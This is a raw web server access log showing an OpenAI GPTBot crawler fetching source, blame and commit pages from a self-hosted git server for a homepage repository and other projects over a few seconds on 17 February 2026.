"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" +[17/Feb/2026:13:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:36:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" [Client 74.7.227.38] [Length 10361] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:36:59 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:36:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" [Client 74.7.227.38] [Length 10601] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" +[17/Feb/2026:13:37:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" +[17/Feb/2026:13:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" +[17/Feb/2026:13:37:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" +[17/Feb/2026:13:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" +[17/Feb/2026:13:37:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10858] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" +[17/Feb/2026:13:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10803] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" +[17/Feb/2026:13:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11495] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:37:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" +[17/Feb/2026:13:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" +[17/Feb/2026:13:37:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13900] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" +[17/Feb/2026:13:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" +[17/Feb/2026:13:37:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" +[17/Feb/2026:13:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" +[17/Feb/2026:13:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 74.7.227.38] [Length 10978] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" +[17/Feb/2026:13:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12785] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" +[17/Feb/2026:13:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" +[17/Feb/2026:13:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" +[17/Feb/2026:13:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10756] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" +[17/Feb/2026:13:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" +[17/Feb/2026:13:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" +[17/Feb/2026:13:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" [Client 74.7.227.38] [Length 11652] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" [Client 74.7.227.38] [Length 38341] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" +[17/Feb/2026:13:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12481] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" +[17/Feb/2026:13:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" +[17/Feb/2026:13:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" +[17/Feb/2026:13:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15336] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" +[17/Feb/2026:13:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11901] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" +[17/Feb/2026:13:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/semiyearly" [Client 74.7.227.38] [Length 8583] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:13:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10927] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx" +[17/Feb/2026:13:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" +[17/Feb/2026:13:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" [Client 74.7.227.38] [Length 19730] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" +[17/Feb/2026:13:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11401] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" +[17/Feb/2026:13:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls" [Client 74.7.227.38] [Length 9929] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html?display=rendered" [Client 74.7.227.38] [Length 14305] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" +[17/Feb/2026:13:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12971] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" +[17/Feb/2026:13:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11156] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" +[17/Feb/2026:13:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 1752045] [Gzip 24.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" +[17/Feb/2026:13:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" +[17/Feb/2026:13:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" 